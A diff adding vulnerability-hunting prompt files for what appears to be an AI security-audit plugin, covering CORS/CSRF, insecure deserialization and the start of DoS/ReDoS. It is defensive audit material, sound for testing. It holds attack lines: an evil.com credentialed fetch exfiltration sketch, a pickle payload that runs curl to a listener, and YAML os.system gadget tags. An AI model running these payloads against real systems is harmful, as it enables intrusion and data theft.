+  "code_excerpt": "res.setHeader('Access-Control-Allow-Origin', req.headers.origin);\nres.setHeader('Access-Control-Allow-Credentials', 'true');",
+  "source": "attacker-chosen Origin request header (req.headers.origin) reflected verbatim; victim has a session cookie auto-attached cross-site",
+  "sink": "Access-Control-Allow-Origin set to the request Origin + Access-Control-Allow-Credentials:true — lets attacker-origin JS read the credentialed response",
+  "data_flow": "req.headers.origin -> res ACAO header (no allowlist/equality check) ; ACAC=true ; applied globally including /api/account which returns the session user's PII and CSRF token",
+  "sanitizers_checked": "no origin allowlist (any origin reflected); credentials explicitly enabled; not gated to safe public endpoints; SameSite irrelevant — CORS read bypasses it; evil.com fetch('/api/account',{credentials:'include'}) succeeds and reads body",
+  "rationale": "Any malicious site visited by a logged-in user can read /api/account (PII + the anti-CSRF token), enabling account-data theft and downstream CSRF against token-protected writes. Same middleware also fronts /api/admin (admin.ts:9).",
+  "exploit_sketch": "On evil.com: fetch('https://app.example.com/api/account',{credentials:'include'}).then(r=>r.json()).then(d=>exfil(d)). ACAO echoes https://evil.com, ACAC:true -> browser exposes the response.",
+  "dynamic_poc_plan": "Authenticate to get a session cookie; replay GET /api/account with header 'Origin: https://evil.com' and observe the response carries 'Access-Control-Allow-Origin: https://evil.com' + 'Access-Control-Allow-Credentials: true' alongside the user's private body — proving cross-origin credentialed read.",
+  "proposed_fix": "Stop trusting the attacker-controlled Origin: the credentialed CORS policy must only echo origins from a closed, trusted allowlist so a foreign site can no longer read authenticated responses. (High-level direction; the exact mechanism is left to the implementing engineer.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. For this class, `source` names the cross-origin provenance
+(forged request / reflected Origin / cross-origin message) and the auth
+mechanism that makes it exploitable (cookie/Basic — auto-attached). `sink` is
+the precise unguarded mutating handler or the exact ACAO/ACAC/framing config.
+`data_flow` traces how a foreign origin issues/reads the request and names every
+guard encountered and why it fails (token absent/exempt, SameSite=None,
+substring origin match, ACAC+reflection). `sanitizers_checked` is the §4 FP
+guard made explicit — list each control (token, SameSite, Origin check, CORS
+allowlist, framing header, postMessage origin check) and state it is absent or
+name the exact bypass. A route with no ambient credentials, an effective token,
+a SameSite-Lax/Strict cookie on a non-GET sink, or a closed-allowlist CORS
+policy is NOT a finding. Use `status:"likely"` for a proven static trace,
+`"confirmed"` only after dynamic repro, `"triage"` if the auth mechanism /
+reachability is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a foreign origin can drive or read a credentialed action. Establish
+a real authenticated session first (the cookie is the ammunition), then attack
+from a *different* origin.
+
+1. **CSRF (cross-site write):** with a valid session cookie held by the
+   browser/agent, replay the state-changing request **without** the anti-CSRF
+   token and **with** a foreign/absent `Origin`/`Referer`
+   (`Origin: https://evil.example`). **Observed proof:** the server performs the
+   mutation (200 + the side effect verified out-of-band — record changed,
+   password reset, role granted). If it 403s on the missing token / bad Origin,
+   the guard holds → not a finding. For the realistic browser PoC, stand up an
+   attacker page that auto-submits a form / fires `fetch(..,
+   {credentials:'include', mode:'no-cors'})` to the target and confirm the
+   side effect lands while only the cookie (no token) traveled.
+2. **CORS (cross-origin read):** replay a credentialed request to the sensitive
+   endpoint with `Origin: https://evil.example`. **Observed proof:** the
+   response includes `Access-Control-Allow-Origin: https://evil.example` (echoed
+   or wildcard) **and** `Access-Control-Allow-Credentials: true`, and the body
+   contains private/session data — meaning attacker JS would be allowed to read
+   it. Run the bypass probes when an allowlist exists: `Origin:
+   https://trusted.com.evil.example` (prefix/substring match), `https://eviltrusted.com`
+   (suffix match / unanchored regex), `Origin: null` — and check which the server reflects.
+3. **Clickjacking:** request the sensitive page and inspect response headers for
+   `X-Frame-Options` and CSP `frame-ancestors`. **Observed proof:** both absent
+   (or a permissive `frame-ancestors *`); confirm by loading the page in an
+   `<iframe src=...>` from a different origin and verifying it renders and its
+   buttons are clickable (a transparent-overlay PoC clinches it).
+4. **postMessage:** from an attacker-controlled framing page, `postMessage` a
+   crafted payload to the target frame and observe the handler acting on it
+   (navigation/state change) despite the foreign origin.
+
+Record the exact request/headers/payload and the observed evidence in the
+`Repro` object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`,
+`impact`). A header-only confirmation (CORS reflection observed, framing headers
+absent) is sufficient proof for those sub-classes — set `method:"live-exploit"`
+and note that browser-side reachability was inferred from the headers.
diff --git a/plugins/security/prompts/finders/deserialization.md b/plugins/security/prompts/finders/deserialization.md
new file mode 100644
index 0000000..5554643
--- /dev/null
+++ b/plugins/security/prompts/finders/deserialization.md
@@ -0,0 +1,338 @@
+<!--
+FINDER PROMPT — deserialization. You are a fresh-context auditor hunting ONE
+class: Insecure Deserialization & Integrity. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding: only a REACHABLE
+untrusted-bytes -> object-reconstruction sink (or an unverified code/data
+ingestion channel) where no effective integrity check / safe-loader / type
+allowlist sits on the path is a finding. No defense-in-depth musings, no dead
+code, no posture items (a missing signing *policy* is not a finding; a code path
+that loads unsigned bytes IS).
+-->
+
+# Finder — Insecure Deserialization & Integrity (`deserialization`)
+
+**Class key:** `deserialization` · **OWASP:** A08:2025 · **CWE:** CWE-502
+(deserialization of untrusted data) / CWE-494 (download of code without integrity
+check) / CWE-345 (insufficient verification of data authenticity) ·
+**ASVS:** V2/V15
+
+## 1. Objective
+
+Find places where untrusted bytes are turned back into live objects by a
+deserializer that can instantiate arbitrary types or invoke logic during
+reconstruction (pickle/Marshal/YAML/native object streams), OR where code/data
+is fetched and executed/loaded without verifying its authenticity (unsigned
+update, plugin, or config channels). The bug is the bytes-on-the-wire becoming
+*behavior* — gadget-driven RCE on deserialize, or a tampered/forged payload that
+the app trusts because nothing checks a signature/hash.
+
+## 2. Where to look
+
+Entry points where externally-controlled bytes reach a rich deserializer, or
+where the app pulls in code/data it then trusts:
+
+- **Session / cookie / token stores:** server-side session backends that
+  serialize the session object (Rails `cookie_store` with `Marshal`, PHP
+  `$_SESSION` handler, signed-then-pickled Flask/Beaker sessions, JSF
+  `ViewState`, ASP.NET `__VIEWSTATE`/`LosFormatter`/`ObjectStateFormatter`).
+  A cookie/hidden-field that round-trips through a native serializer is the
+  classic sink.
+- **Caches & queues:** Redis/Memcached values, Sidekiq/Resque/Celery/Bull job
+  args, Kafka/RabbitMQ message bodies, anything `Marshal.dump`/`pickle.dumps`/
+  `serialize()` written then read back — second-order if an attacker can write
+  the cache/queue.
+- **Inter-service & RPC:** message bodies decoded with a polymorphic/typed
+  serializer (Java `ObjectInputStream`, .NET `BinaryFormatter`, Jackson with
+  default typing, Python `pickle` over a socket), gRPC/Thrift wrappers that fall
+  back to native serialization, webhook payloads parsed as YAML/pickle.
+- **Config / data import:** YAML/XML/JSON ingestion of user-supplied files or
+  request bodies — uploaded `.yml`/`.yaml`/`.xml`, "import settings", CI configs,
+  rule/template files, `.npmrc`/lockfiles parsed by a code-executing loader.
+- **File upload & document pipelines:** uploaded blobs deserialized for "resume",
+  "restore", "load model" (ML `torch.load`/`joblib.load`/`pickle` model files),
+  spreadsheet/notebook/save-game/state-blob loaders.
+- **Update / plugin / extension channels:** auto-updaters, plugin/theme
+  installers, remote module/script loaders, `eval`-on-fetched-content, dynamic
+  `require`/`import`/`dlopen` of a downloaded artifact, container/helm/terraform
+  module pulls — look for the *missing* signature/checksum verification on the
+  fetched bytes (CWE-494/345), and TOFU "verify only on first install".
+
+Route/handler/field signals to grep: `session`, `cookie`, `state`,
+`viewstate`, `token`, `payload`, `data`, `blob`, `restore`, `import`, `load`,
+`deserialize`, `unmarshal`, `unserialize`, `loads`, `from_*`, `cache`, `job`,
+`message`, `update`, `plugin`, `manifest`, `package`, `model`, `checkpoint`.
+
+Per-language SINK signals (the dangerous calls):
+
+- **Crystal:** there is no native object-graph deserializer with code-exec on
+  load; risk is YAML/MessagePack/JSON mapped onto **types chosen by the
+  payload** (a `Type` discriminator / union deserialized from input that selects
+  a class with side-effecting `after_initialize`/`from_yaml` hooks), or shelling
+  out / `eval`-equivalent on bytes pulled from an unverified channel. Also flag
+  `Process.run`/dynamic load of a fetched artifact without checksum/signature
+  (CWE-494). Plain `JSON.parse`/`YAML.parse` to a fixed struct is safe.
+- **Ruby:** `Marshal.load`/`Marshal.restore`, `YAML.load`/`YAML.unsafe_load`/
+  `Psych.load` (`YAML.load` is unsafe before Psych 4 / Ruby 3.1; `Psych.unsafe_load` always),
+  `Oj.load` in `:object` mode, `Object#from_json`-style polymorphic loaders,
+  ERB/`eval` on fetched content, `Kernel.open`/`load`/`require` of a downloaded
+  path. Rails `MessageVerifier`/`MessageEncryptor` *with* `Marshal` coder and a
+  weak/leaked secret = forged Marshal payload.
+- **Node/TS:** `node-serialize` `unserialize()` (executes `_$$ND_FUNC$$_`),
+  `funcster`, `serialize-javascript` + `eval`, `cryo`, `js-yaml`
+  `yaml.load(... )` with a non-safe schema or custom `!!js/function` tags
+  (`DEFAULT_FULL_SCHEMA`), `vm.runInNewContext`/`eval`/`Function(x)` on a
+  payload, `JSON.parse` then `require(userPath)`, dynamic `import(userUrl)`.
+- **Python:** `pickle.load`/`pickle.loads`/`cPickle`/`dill`/`cloudpickle`,
+  `shelve`, `marshal.loads` of bytecode, `yaml.load(x)` **without**
+  `Loader=SafeLoader`/`yaml.safe_load` (full loader runs `!!python/object`/
+  `!!python/object/apply`), `jsonpickle.decode`, `torch.load`/`joblib.load`
+  (pickle under the hood), `numpy.load(..., allow_pickle=True)`,
+  `xml.etree`/`lxml` with entity expansion, `eval`/`exec`/`__import__` on input.
+- **Go:** `encoding/gob` `Decode` of untrusted streams into interface targets,
+  `encoding/xml`/`json` into `interface{}` with reflection-driven type selection,
+  third-party `mapstructure`/`yaml.Unmarshal` to a type chosen by a payload
+  discriminator, `plugin.Open` of a downloaded `.so`, `go-getter`/module fetch
+  without checksum. (Go has no native code-exec-on-decode; risk is gob to
+  interfaces, polymorphic dispatch, and unverified plugin/module loads.)
+- **PHP:** `unserialize($_*)` (PHP Object Injection — `__wakeup`/`__destruct`/
+  `__toString` gadgets), `unserialize` with no `allowed_classes`,
+  `yaml_parse` with `!php/object`, `Symfony Serializer` with `ObjectNormalizer`
+  on untrusted type, `phar://` stream wrapper on attacker path (metadata
+  unserialize), `eval`/`assert`/`create_function`/`include` of fetched content.
+- **Java:** `ObjectInputStream.readObject()` / `readUnshared()` on a request,
+  `XMLDecoder.readObject()`, Jackson `enableDefaultTyping()` /
+  `@JsonTypeInfo(use=CLASS)` polymorphic deserialization, `XStream` without a
+  type allowlist, SnakeYAML `new Yaml().load(x)` (constructs arbitrary types),
+  `Hessian`/`Kryo`/`Burlap`, RMI/JNDI lookups, `LosFormatter`/`BinaryFormatter`
+  (.NET interop). `Runtime.exec` of a downloaded jar / `URLClassLoader` of an
+  unverified URL.
+- **Rust:** typically memory-safe, but flag `serde` with
+  `#[serde(tag=...)]`/untagged enums driven by a payload that selects a variant
+  with side-effecting `Deserialize`, `bincode`/`rmp-serde` into trait objects,
+  `dlopen`/`libloading` of a downloaded library, and unverified
+  download-and-run/update flows (CWE-494).
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP cookies/headers/body/query/path, hidden
+form fields & view-state, uploaded files & their contents, cache/queue/message
+values an attacker can write (second-order), inter-service payloads from a
+zone an attacker can reach, and **bytes fetched from a remote update/plugin/
+module endpoint** (the network response is the untrusted input for the
+integrity sinks). A signed-or-encrypted blob is only trusted if the verification
+actually runs *before* deserialization and the key is secret — otherwise treat
+it as untrusted.
+
+**Taint SINKS** (dangerous op): the §2 calls. Two distinct sink shapes:
+
+1. **Rich deserializer (CWE-502):** a call that, while reconstructing, can
+   instantiate attacker-chosen types and trigger their constructors/magic
+   methods/registered hooks (pickle, Marshal, native object streams, full-schema
+   YAML, polymorphic Jackson/XStream/SnakeYAML, `node-serialize`,
+   `unserialize`). Reaching it with attacker bytes = gadget-chain RCE potential.
+2. **Unverified code/data ingestion (CWE-494/345):** fetch-then-execute/load
+   where no signature or checksum gates the bytes (auto-update, plugin install,
+   remote `require`/`import`/`dlopen`, `eval` on fetched text).
+
+Vulnerable patterns to confirm:
+
+- **Untrusted bytes -> native deserializer:** `pickle.loads(request.body)`,
+  `Marshal.load(cookies[:s])`, `unserialize($_GET['x'])`,
+  `ObjectInputStream(req.getInputStream()).readObject()`,
+  `unserialize(req.body)` (node-serialize). Confirm the input is attacker-set and
+  the deserializer is the rich/polymorphic kind, not a fixed-schema JSON map.
+- **Unsafe YAML loader:** `yaml.load(x)` (Python, no SafeLoader),
+  `YAML.load`/`Psych.unsafe_load` (Ruby), `js-yaml` full schema, SnakeYAML
+  default constructor — input contains `!!python/object/apply:os.system`,
+  `!ruby/object:`, `!!js/function`, or a Java type tag. The tell is a *non-safe*
+  loader on a value that crosses a trust boundary.
+- **Polymorphic type selection from payload:** Jackson default typing /
+  `@class`/`$type` discriminator, XStream/SnakeYAML class construction,
+  jsonpickle, a custom `type` field that does `Object.const_get(t).new(...)` /
+  `Class.forName(t)` / `globals()[t]` — the payload picks the class, enabling
+  gadget instantiation even over "JSON".
+- **Magic-method gadget surface (PHP/Python/Ruby/Java):** the codebase or its
+  deps contain classes with `__wakeup`/`__destruct`/`__toString`/`readObject`/
+  `finalize`/`__reduce__` that do file/IO/exec/SQL — a usable gadget. You
+  do not need the full chain to flag; an untrusted feed into `unserialize`/
+  `readObject` with no class allowlist is the finding.
+- **phar deserialization (PHP):** any filesystem call (`file_exists`, `fopen`,
+  `getimagesize`, `unlink`) on an attacker-controlled path that may carry a
+  `phar://` wrapper — metadata is unserialized on access.
+- **Forged signed/encrypted blob:** a `MessageVerifier`/HMAC/JWT-wrapped
+  serialized object where the secret is hardcoded, defaulted, leaked, or the
+  algorithm is `none`/unverified — attacker forges the inner Marshal/pickle and
+  it deserializes. The crypto wrapper is *not* a mitigation if the key is
+  guessable or the verification is skipped.
+- **Unsigned update / plugin (CWE-494/345):** code/artifact downloaded over a
+  channel without checksum-or-signature verification before
+  exec/load/`require`/`dlopen`/extract, signature verified with a hardcoded/empty
+  key, TOFU-only ("verify first time, trust forever"), or the download URL itself
+  is attacker-influenceable (chains with SSRF/MITM). Plain HTTP fetch of a
+  to-be-executed artifact is in scope.
+- **Second-order:** an attacker writes a cache/queue/DB value that is later
+  `Marshal.load`/`pickle.loads`-ed by a worker — trace the *read* site and prove
+  the write is attacker-reachable.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Safe loader / fixed-schema parser:** `yaml.safe_load`/`Loader=SafeLoader`/
+  `Psych.safe_load`/`YAML.safe_load` with a default-empty `permitted_classes`,
+  `js-yaml` default (safe) schema, `json.loads`/`JSON.parse`/`encoding/json`
+  into a **declared struct/class** (no polymorphic type from payload), Crystal
+  `from_json`/`from_yaml` onto a concrete type, protobuf/`MessagePack` into a
+  fixed schema. These cannot instantiate attacker-chosen code-bearing types —
+  not a finding.
+- **Class allowlist on the deserializer:** PHP `unserialize($x, ['allowed_classes'
+  => [...]])` (or `false`), Java `ObjectInputFilter`/`setObjectInputFilter`/
+  validating resolve, XStream `allowTypes`/permissions, Jackson
+  `PolymorphicTypeValidator`/`activateDefaultTyping(ptv)` with a tight base,
+  SnakeYAML `SafeConstructor`, Ruby `safe_load(permitted_classes: [Symbol,...])`
+  restricted to inert types. If the allowlist truly excludes any class with an
+  exploitable hook, it's safe; if it permits a gadget type, it is NOT.
+- **Authenticated integrity BEFORE deserialize, with a real secret:** a MAC/
+  signature (HMAC, Ed25519, `MessageVerifier`, JWS) verified on the bytes
+  *prior* to handing them to the deserializer, where the key is server-side,
+  high-entropy, not defaulted/committed, and the algorithm is fixed (not `none`,
+  no alg-confusion). This closes the *forgery* path — attacker cannot supply
+  arbitrary bytes. (It does NOT help if an authenticated attacker can still get
+  the server to sign their object, e.g. self-service session contents — then the
+  deserializer is still reachable with attacker data.)
+- **Update/plugin channel verifies authenticity:** signature checked against a
+  pinned public key (not fetched alongside the artifact), or a strong checksum
+  pinned in trusted source/lockfile and compared before use, over a channel where
+  the key/hash isn't attacker-substitutable. TLS alone is NOT integrity for the
+  artifact (it protects transport, not a compromised mirror/registry) — credit
+  it only as transport, not as the §3 integrity control.
+- **Bytes provably not attacker-influenced:** the serialized source is a trusted
+  internal store the attacker cannot write (server-generated, never round-trips
+  through the client, no cross-tenant write), a hardcoded/bundled asset, or a
+  fixture/test file — no untrusted source reaches the sink.
+- **Loader called only on developer-controlled input at build/boot:** `yaml.load`
+  of an app's own bundled config read from the repo (not user-uploaded, not
+  request-driven) — no trust boundary crossed.
+
+If a guard exists but is bypassable, it is NOT a mitigation — flag it and name
+the bypass in `sanitizers_checked`: an allowlist that still permits a gadget
+class; HMAC with a default/committed/leaked secret or `alg:none`/alg-confusion;
+"safe" YAML that still resolves a dangerous custom tag; a checksum fetched from
+the same untrusted source as the artifact; signature verification that is
+TOFU-only or skipped on a code path; `allowed_classes` set on the wrong call;
+phar guard that only blocks `phar://` literally but not via wrapper aliases.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable untrusted-bytes -> rich deserializer
+  (pickle/Marshal/`unserialize`/`ObjectInputStream`/full-YAML/polymorphic) with a
+  plausible gadget in the app or its dependency graph -> RCE; OR an unsigned
+  update/plugin/remote-load channel that runs attacker-substitutable code on the
+  server with no integrity check. Server-side code execution, no auth needed.
+- **High** — same sink class but behind an auth wall or requiring realistic
+  conditions (authenticated user can place the payload, second-order via a cache/
+  queue the attacker can write), or forgeable signed-blob deserialization where
+  the secret is weak/leaked; impact is still RCE or full object-graph control.
+- **Medium** — polymorphic/type-driven deserialization where no exploitable
+  gadget is evident but type selection is attacker-controlled (DoS, type
+  confusion, partial control), YAML/XML into a fixed type with only entity-
+  expansion/DoS reach, or an integrity gap mitigated partially (checksum present
+  but weak, TLS-only on a low-value artifact).
+- **Low/Info** — deserialization of data the attacker cannot influence, a safe
+  loader misread on first glance, or a theoretical gadget with no reachable
+  source — downgrade or drop per §4.
+
+Second-order (cache/queue-fed) deserialization keeps the severity of the sink;
+note the write->read path and who can write the store in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "deserialization-001",
+  "title": "Unauthenticated RCE via Marshal.load of attacker-controlled session cookie",
+  "vuln_class": "deserialization",
+  "owasp": "A08:2025",
+  "cwe": "CWE-502",
+  "asvs": "V2",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/middleware/session_loader.rb",
+  "line": 18,
+  "end_line": 20,
+  "code_excerpt": "raw = Base64.decode64(cookies[:_state])\nsession = Marshal.load(raw)",
+  "source": "cookies[:_state] — client-supplied cookie, base64-decoded, no signature/MAC checked before load",
+  "sink": "Marshal.load(raw) — Ruby native object-graph deserializer; instantiates arbitrary types and runs their hooks on reconstruction",
+  "data_flow": "cookies[:_state] -> Base64.decode64 -> Marshal.load; bytes go straight into the rich deserializer with no MessageVerifier/HMAC/safe_load between source and sink; attacker fully controls the byte stream",
+  "sanitizers_checked": "no integrity check before load (no MessageVerifier/HMAC verify on the path); not safe_load and Marshal has no class allowlist; cookie is not signed/encrypted; gadget chain present via Gem::Requirement/erb in bundled deps",
+  "rationale": "Reachable on every request from an unauth route via the cookie. A Universal Ruby gadget chain (e.g. through a loaded gem) yields command execution on deserialize. Same Marshal.load read at workers/cache_reader.rb:44 (second-order via Redis).",
+  "exploit_sketch": "Craft a malicious Marshal payload with a known Ruby gadget chain, base64-encode, set as the _state cookie, send any request -> Marshal.load reconstructs the chain -> command runs.",
+  "dynamic_poc_plan": "Build a benign-but-observable gadget (e.g. one that touches a unique file or triggers an outbound request to a listener); send it as the cookie; observe the side effect (file created / listener hit) proving code ran during deserialize.",
+  "proposed_fix": "Client-held state must not flow into a rich object-graph deserializer; move to an authenticated, fixed-schema representation so attacker bytes can never reconstruct arbitrary types. (Exact mechanism and code left to the implementer.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source->sink and states why the
+bytes reach a *rich* deserializer (or an unverified load) rather than a
+fixed-schema parser, naming any integrity/allowlist guard encountered and why it
+fails. `sanitizers_checked` is the FP guard made explicit — list each §4 control
+and state it is absent or, if present, name the exact bypass (e.g. "HMAC secret
+is the committed default in config/secrets.yml" or "allowed_classes includes
+ERB"). A finding without an untrusted source reaching a real deserializer/
+unverified-load sink is not a finding. Pick `cwe`: 502 for object-reconstruction
+deserialization, 494 for download-of-code-without-integrity, 345 for general
+authenticity-verification gaps (forged signed blobs, missing/forgeable
+checksums). Use `status:"likely"` for a proven static trace, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/source/gadget availability is
+uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running app turns attacker bytes into behavior (code exec or
+trusted-state forgery), not just parses data. Pick the proof matching the sink:
+
+1. **Rich deserializer -> code exec (observable side effect).** Build a
+   *benign* payload using a real gadget for the runtime and library set
+   (`ysoserial`/`ysoserial.net` for Java/.NET, a Ruby/PHP/Python gadget chain, or
+   `node-serialize`'s IIFE form), where the gadget performs a harmless,
+   observable action — write a unique file under `/tmp`, `sleep N`, or fire an
+   outbound request to a controlled listener with a nonce. Deliver it via the
+   real channel (cookie/header/body/upload/queue). **Observed proof** = the side
+   effect occurs (the nonce file appears, latency tracks the sleep, or the
+   listener records the callback) — impossible if the bytes were parsed as inert
+   data.
+   - Python pickle: payload whose `__reduce__` returns `(os.system, ("curl
+     http://<listener>/<nonce>",))`.
+   - PHP: object with a `__destruct`/`__wakeup` gadget; deliver via the
+     `unserialize` source (or `phar://` upload + a filesystem op on its path).
+   - YAML: `!!python/object/apply:os.system ["sleep 5"]` /
+     `!ruby/object` / `!!js/function` against the unsafe loader.
+2. **Forged signed/encrypted blob.** If the channel wraps the object in a MAC/
+   signature, test the secret: try the framework default secret, a value found in
+   the repo/env dump, or `alg:none`/alg-confusion. **Observed proof** = a
+   self-forged serialized payload is accepted and deserialized (side effect from
+   step 1 fires), demonstrating the integrity layer is bypassable.
+3. **Polymorphic / type-driven (no full gadget).** Send a payload selecting an
+   unexpected class via the discriminator (`@class`/`$type`/`type` field, YAML
+   tag). **Observed proof** = the app instantiates the chosen type (distinct
+   error, side effect, or behavior change) — confirms attacker-controlled type
+   selection even if RCE isn't reached; report at the severity that control
+   warrants.
+4. **Unsigned update / plugin (integrity gap).** Stand up a malicious
+   mirror/registry response (or MITM the fetch in the test env) serving a
+   tampered artifact with a benign marker. **Observed proof** = the app installs/
+   loads/executes the tampered artifact (marker side effect fires) without
+   rejecting it — proves no effective signature/checksum gate.
+
+Record the exact payload, delivery request, and observed evidence in the `Repro`
+object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+sleep/OOB callback alone proves code execution — set `method:"live-exploit"` and
+note any blindness in `notes`. If the app can't be run, fall back to a focused
+unit test that drives the sink with the gadget payload
+(`method:"unit-test"`); a build-only check that confirms a vulnerable
+loader/no-integrity path is `method:"build-only"` and stays `status:"likely"`.
diff --git a/plugins/security/prompts/finders/dos-redos.md b/plugins/security/prompts/finders/dos-redos.md
new file mode 100644
index 0000000..ff23c0e
--- /dev/null
+++ b/plugins/security/prompts/finders/dos-redos.md
@@ -0,0 +1,339 @@
+<!--
+FINDER PROMPT — dos-redos. You are a fresh-context auditor hunting ONE class:
+Denial of Service & ReDoS. Read the target's code; emit finding objects. Signal
+discipline (AGENTS.md) is binding: only a REACHABLE path from untrusted input to
+a sink whose COST (CPU, memory, time, disk, FDs) the attacker can blow up
+super-linearly or unboundedly, with no effective limit/timeout/validator on the
+path, is a finding. No defense-in-depth musings, no dead code, no posture items.
+A regex that is merely "complex" is not a finding unless an attacker controls the
+subject string and the pattern is provably super-linear.
+-->
+
+# Finder — Denial of Service & ReDoS (`dos-redos`)
+
+**Class key:** `dos-redos` · **OWASP:** A06:2025 · **CWE:** CWE-1333 (ReDoS) /
+CWE-400 (uncontrolled resource consumption) / CWE-770 (alloc without limit) /
+CWE-834 (excessive iteration) · **ASVS:** V2
+
+## 1. Objective
+
+Find places where untrusted input drives an operation whose cost (CPU time,
+memory, disk, file descriptors, threads, output size) grows super-linearly or
+without bound, so a single small request — or a few of them — exhausts a
+resource and denies service. The bug is the *attacker controlling the amount of
+work*, not the correctness of the result.
+
+## 2. Where to look
+
+Entry points where a request value reaches an expensive or unbounded operation:
+
+- **Regex on request data:** input matched/validated against a regex —
+  validators on email/URL/slug/phone/markup, route constraints, log/UA parsers,
+  search highlighters, sanitizers, content-type/Accept parsing, CSV/markdown/
+  template processing. Highest risk where the *pattern is static but the subject
+  is attacker-controlled and unbounded in length*.
+- **Body / upload size:** JSON/form/multipart/GraphQL bodies parsed before any
+  size check; file uploads buffered fully into memory; streaming endpoints read
+  to completion. Look for missing `client_max_body_size` / body-limit middleware
+  / `MaxBytesReader`.
+- **Decompression & archives:** gzip/deflate/brotli request bodies, `.zip`/
+  `.tar.gz`/`.gz` uploads expanded to disk/memory, image/PDF/XML decoders, nested
+  archives — zip bombs (high compression ratio), decompression to unbounded size,
+  zip-slip-adjacent file-count/entry-count blowups.
+- **Pagination / fan-out / loops:** `limit`/`per_page`/`count`/`size`/`n`/`depth`
+  /`repeat`/`times` taken from input and used as a loop bound, array size,
+  range, or batch size with no cap; recursive parsers/serializers whose depth is
+  input-driven (deeply nested JSON/XML/YAML — "billion laughs", recursive
+  GraphQL); `Array.new(n)`/`"x" * n` style pre-allocation from input.
+- **XML / markup expansion:** XML entity expansion (DTD, `ENTITY`), YAML
+  anchors/aliases (`*a`), nested JSON depth, GraphQL query depth/aliasing/
+  introspection abuse, template engines expanding input-driven loops.
+- **Expensive crypto / hashing on input:** attacker-chosen iteration counts or
+  key sizes (PBKDF2/bcrypt/scrypt/argon2 cost from input), RSA key parsing of
+  huge moduli, signature checks on unbounded data.
+- **Unbounded external/IO work:** DB queries with input-controlled `LIMIT`/no
+  limit returning whole tables, N+1 driven by input array length, sleeping/
+  retrying loops whose count/delay comes from input, spawning processes/threads
+  per request item, opening FDs/sockets per input element.
+
+Route/param signals to grep: `limit`, `count`, `size`, `per_page`, `page`,
+`offset`, `depth`, `n`, `num`, `repeat`, `times`, `length`, `width`, `height`,
+`quality`, `iterations`, `rounds`, `pattern`, `regex`, `q`, `search`, `filter`,
+`format`, `range`, `from`/`to`, `Content-Length`, `Content-Encoding`,
+`Accept`/`Range` headers, multipart filenames.
+
+Per-language SINK signals:
+
+- **Crystal:** `Regex.new(user)` / `str =~ /.../` with attacker `str`; `body =
+  request.body.try(&.gets_to_end)` with no size cap; `Array.new(n)` /
+  `"x" * n` from params; `Compress::Gzip::Reader` / `Compress::Zip::File`
+  reading uploads unbounded; `JSON.parse` on unbounded body (no framework
+  guard); recursion over parsed input.
+- **Ruby:** `subject =~ /(\w+)+$/` or `Regexp.new(params[:re])`; Rack/Rails
+  reading `request.body.read` without limit; `params[:n].to_i.times { ... }`,
+  `Array.new(params[:n].to_i)`, `"a" * params[:n].to_i`; `Zlib::GzipReader`,
+  `Zip::File.open` extracting entries without size/count cap; `Nokogiri::XML(x)`
+  without `NONET`/no-DTD; `JSON.parse(x)` deep nesting; `Marshal.load` size.
+- **Node/TS:** a static catastrophic regex `.test(req.query.x)` / `.match()`;
+  `new RegExp(req.body.pattern)`; `express.json()` without `limit`; reading the
+  whole stream (`for await (const c of req)`) with no cap; `zlib.gunzipSync`/
+  `inflateSync` on request data; `unzipper`/`adm-zip`/`tar.extract` of uploads;
+  `Array(n).fill()` / `Buffer.alloc(n)` / `'x'.repeat(n)` from input;
+  unbounded GraphQL query (no depth/cost limit plugin); `JSON.parse` of huge body.
+- **Python:** `re.match(r'...', user)` super-linear / `re.compile(user_pattern)`;
+  Flask/Django reading `request.data`/`request.get_data()` / no
+  `DATA_UPLOAD_MAX_MEMORY_SIZE`; `gzip.decompress(data)`,
+  `zipfile.ZipFile(...).extractall()` / `tarfile.open().extractall()` (also reads `.file_size`),
+  `bz2`/`lzma` on input; `[0]*n`, `' '*n`, `range(n)` loops from input;
+  `lxml.etree.parse` with DTD/entities not disabled; `xml.sax`/`xmlrpc`;
+  `PIL.Image.open` on huge dimensions (decompression bomb).
+- **Go:** `regexp.MustCompile` is RE2 (linear — usually NOT ReDoS; see §4), but
+  `io.ReadAll(r.Body)` without `http.MaxBytesReader`, `gzip.NewReader` /
+  `archive/zip` / `archive/tar` reading without limiting `io.Copy` (use
+  `io.LimitReader`), `make([]T, n)` / `make([]byte, n)` with input `n`,
+  `strings.Repeat(s, n)`, input-bounded `for` loops, `encoding/json` deep nesting.
+- **PHP:** `preg_match('/(a+)+$/', $input)` (PCRE backtracking, also
+  `pcre.backtrack_limit`); reading `php://input` / large `$_POST` without
+  `post_max_size` enforced in code; `gzdecode`/`gzuncompress`/`bzdecompress` on
+  input, `ZipArchive::extractTo`, `unserialize` on big input; `str_repeat($s,$n)`
+  / `array_fill(0,$n,...)` from request; `simplexml_load_string` with DTD.
+- **Java:** `Pattern.compile(p)` / `s.matches(regex)` with backtracking groups;
+  `Pattern.compile(userPattern)`; reading the full `InputStream`/multipart
+  without `maxRequestSize` / `DataBufferLimitException` config;
+  `GZIPInputStream`/`ZipInputStream`/`ZipFile.entries()` without size/count cap
+  (`getSize()`/`getCompressedSize()` ratio); `DocumentBuilderFactory` with
+  external entities/DTD enabled (XXE-DoS); `new int[n]` / `new byte[n]` from
+  input; input-driven recursion (`StackOverflowError`).
+- **Rust:** the `regex` crate is linear-time (NOT ReDoS) — but `fancy-regex`
+  (backtracking) with attacker subject is; `hyper`/`axum` body read without
